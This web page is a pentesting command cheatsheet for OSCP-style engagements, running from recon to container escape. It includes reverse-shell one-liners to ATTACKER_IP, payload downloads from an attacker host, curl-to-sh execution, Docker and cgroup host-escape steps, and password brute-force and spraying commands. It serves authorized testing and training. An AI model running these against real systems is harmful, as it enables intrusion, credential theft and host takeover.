Pentesting Commands Cheatsheet 2026

200+ essential pentesting commands organized by category. From recon to post-exploitation — everything you need for your next pentest engagement or OSCP exam.

Last updated:

Quick Navigation

01 Reconnaissance 02 Web Application 03 Network Services 04 Linux Privilege Escalation 05 Windows Privilege Escalation 06 Active Directory 07 Password Attacks 08 Post-Exploitation 09 Wireless 10 Cloud & Kubernetes 11 Container Escape

# Reconnaissance

Information gathering is the foundation of every pentest. Start with passive recon, then move to active scanning.

Nmap — Network Discovery

nmap -sC -sV -oA scan_results TARGET_IP
Default scripts + version detection with output in all formats
nmap -p- -T4 --min-rate=1000 TARGET_IP
Full TCP port scan — fast mode
nmap -sU --top-ports 200 TARGET_IP
UDP scan on top 200 ports
nmap --script vuln TARGET_IP
Run all vulnerability detection scripts

Subdomain & DNS Enumeration

subfinder -d TARGET_DOMAIN -o subdomains.txt
Passive subdomain enumeration
amass enum -d TARGET_DOMAIN -o amass_results.txt
In-depth subdomain enumeration with OSINT
dig axfr @DNS_SERVER TARGET_DOMAIN
Attempt DNS zone transfer

Directory & File Brute-force

feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
Fast recursive directory brute-force with extensions
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Classic directory brute-force with 50 threads

# Web Application Hacking

Test for OWASP Top 10 vulnerabilities: SQLi, XSS, SSRF, IDOR, authentication bypass, and more.

SQL Injection

sqlmap -u "https://TARGET/page?id=1" --dbs --batch
Automatic SQLi detection + database enumeration
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
Enumerate tables in a specific database
sqlmap -r request.txt --level 5 --risk 3 --batch
SQLi from saved Burp request with max level

XSS (Cross-Site Scripting)

dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
Automated XSS scanner with callback for blind XSS

SSRF & LFI

ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
SSRF fuzzing with response matching
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Local File Inclusion fuzzing

Burp Suite Essentials

curl -x http://127.0.0.1:8080 -k https://TARGET
Route traffic through Burp proxy

# Network Services

Common protocols and services you'll encounter during pentests: SMB, FTP, SSH, HTTP, SNMP.

SMB Enumeration

smbclient -L //TARGET_IP -N
List SMB shares anonymously
enum4linux -a TARGET_IP
Full SMB/NetBIOS enumeration
crackmapexec smb TARGET_IP -u '' -p '' --shares
Enumerate shares with null session

FTP

ftp TARGET_IP # Try anonymous:anonymous
Connect with anonymous access

SNMP

snmpwalk -v2c -c public TARGET_IP
Walk SNMP tree with community string "public"

# Linux Privilege Escalation

After getting a shell, escalate to root. Check SUID, capabilities, cron jobs, and kernel exploits.

Enumeration Scripts

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Run LinPEAS for automated privesc enumeration

SUID Binaries

find / -perm -4000 -type f 2>/dev/null
Find all SUID binaries — cross-reference with GTFOBins

Capabilities

getcap -r / 2>/dev/null
List files with Linux capabilities

Cron Jobs

cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Check all scheduled cron jobs

Sudo Misconfigurations

sudo -l
List commands the current user can run as sudo

Writable /etc/passwd

openssl passwd -1 -salt hacker password123
Generate password hash to inject into /etc/passwd if writable

# Windows Privilege Escalation

Escalate from low-priv user to SYSTEM. Token impersonation, service abuse, unquoted paths.

Enumeration

winPEASany.exe quiet fast searchfast
Run WinPEAS for automated Windows privesc enumeration
whoami /priv
Check current privileges — look for SeImpersonate, SeBackup

Token Impersonation

.\GodPotato.exe -cmd "cmd /c whoami"
Exploit SeImpersonatePrivilege (Windows Server 2019+)

Unquoted Service Paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
Find services with unquoted paths outside system directories

# Password Attacks

Crack hashes, brute-force services, and spray credentials across the network.

Hash Cracking

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
Crack NTLM hashes with rules
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Crack hashes with John the Ripper

Online Brute-force

hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
SSH brute-force (4 threads to avoid lockout)

Password Spraying

crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
SMB password spray across user list

# Post-Exploitation

After getting access: establish persistence, pivot, exfiltrate data.

File Transfer

python3 -m http.server 8080
Quick HTTP server to transfer files
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Download file on Windows target

Reverse Shells

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Bash reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Python reverse shell

Shell Upgrade

python3 -c 'import pty;pty.spawn("/bin/bash")'
Upgrade to interactive TTY

Pivoting

chisel server -p 8000 --reverse # On attacker chisel client ATTACKER_IP:8000 R:socks # On target
Set up SOCKS proxy through compromised host

# Wireless Attacks

WiFi pentesting: capture handshakes, crack WPA2, rogue access points.

airmon-ng start wlan0
Enable monitor mode
airodump-ng wlan0mon
Scan for nearby wireless networks
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
Capture packets from target network
aireplay-ng -0 5 -a BSSID wlan0mon
Deauth attack to capture WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Crack WPA2 handshake offline

# Cloud & Kubernetes

Enumerate cloud assets, exploit misconfigurations in AWS, Azure, GCP, and Kubernetes.

AWS

aws sts get-caller-identity
Check current AWS identity
aws s3 ls s3://BUCKET_NAME --no-sign-request
List public S3 bucket contents

Kubernetes

kubectl get pods --all-namespaces
List all pods across namespaces
kubectl auth can-i --list
Check current permissions

# Container & Docker Escape

Escape Docker containers, exploit privileged mode, and abuse the Docker socket for host access.

Docker Enumeration

cat /proc/1/cgroup | grep -i docker
Check if running inside a Docker container
find / -name ".dockerenv" 2>/dev/null
Detect Docker environment file
ls -la /var/run/docker.sock 2>/dev/null
Check if Docker socket is mounted (critical finding)

Docker Socket Abuse (Host Escape)

docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
Mount host filesystem via Docker socket — full host access
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
Enumerate containers via Docker API over socket

Privileged Container Escape

fdisk -l 2>/dev/null | grep "Disk /"
List host disks from a privileged container
mount /dev/sda1 /mnt && chroot /mnt sh
Mount host disk and chroot into it (privileged container)
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
Enter host namespaces — effective escape from privileged container

cgroup Release Agent Escape

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
Step 1: mount cgroup and create child — requires privileged mode
echo 1 > /tmp/cgrp/x/notify_on_release && host_path=$(sed -n 's/.*\soverlay\s.*\supper=\([^,]*\).*/\1/p' /proc/mounts) && echo "$host_path/cmd" > /tmp/cgrp/release_agent
Step 2: configure release_agent to execute payload on host

❓ Pentesting FAQ

This cheatsheet covers 200+ essential commands used in OSCP and real-world pentests: nmap scanning, privilege escalation (Linux and Windows), Active Directory attacks, web hacking, and post-exploitation techniques. Bookmark it and use our dedicated OSCP cheatsheet for exam-specific tips.

The essentials: nmap for network scanning, sqlmap for SQL injection, hashcat/john for password cracking, impacket tools for Active Directory, and linpeas/winpeas for privilege escalation enumeration.

Start with recon tools (nmap, subfinder), learn the OWASP Top 10 web vulnerabilities, then practice on HackTheBox or TryHackMe. Our beginner's guide walks you through the full methodology and recommended certifications.

Privilege escalation is gaining higher permissions than initially obtained. Linux: SUID binaries, sudo misconfigs, cron job abuse, writable PATH. Windows: SeImpersonatePrivilege (GodPotato), unquoted service paths, AlwaysInstallElevated. Always run LinPEAS/WinPEAS first.

Key tools: BloodHound (attack path mapping), impacket (GetUserSPNs, secretsdump, psexec), crackmapexec (credential spraying), evil-winrm (WinRM shells), and Rubeus (Kerberos attacks). Start by mapping the domain with BloodHound to find the shortest path to Domain Admin.

SQL injection is a web vulnerability where user input is executed as SQL code. Test manually with ' OR '1'='1 or use sqlmap -u 'http://target/?id=1' --batch --dbs for automation. It can lead to data exfiltration, auth bypass, or remote code execution.

The OWASP Top 10 lists the most critical web application risks: Broken Access Control, Cryptographic Failures, Injection (SQLi/XSS/SSTI), Insecure Design, Security Misconfiguration, Vulnerable Components, Authentication Failures, Software Integrity Failures, Logging Failures, and SSRF. It's the foundation of any web pentesting methodology.

A reverse shell is a connection where the target machine initiates a connection back to the attacker's listener. Start a listener with nc -lvnp 4444, then trigger the shell on the target: bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1. If bash isn't available, try Python, Perl, or generate a payload with msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.

Lateral movement is the process of pivoting from one compromised host to others on the internal network. Common techniques: Pass-the-Hash with impacket-psexec, Pass-the-Ticket with Kerberos TGTs, SSH agent forwarding, and port forwarding via chisel or SSH tunnels. BloodHound maps the shortest lateral movement path to Domain Admin.

A vulnerability scan (Nessus, OpenVAS) automatically identifies known CVEs and misconfigurations — no exploitation. A penetration test goes further: a tester actively exploits vulnerabilities, escalates privileges, and demonstrates real business impact. Pentests require written authorization and follow a defined scope.

📚 Related Resources

AI-Assisted Pentest Report

Turn your findings into a professional PDF report. AI auto-fills CVE, CVSS and severity.

Try for free →

Want 12,020+ commands in an interactive mindmap?

This cheatsheet shows a fraction of what Pentest Mindmap offers. Get 34 categories, instant search, and one-click copy — organized as a beautiful interactive mindmap.

Create free account →
📎 Found this cheatsheet useful?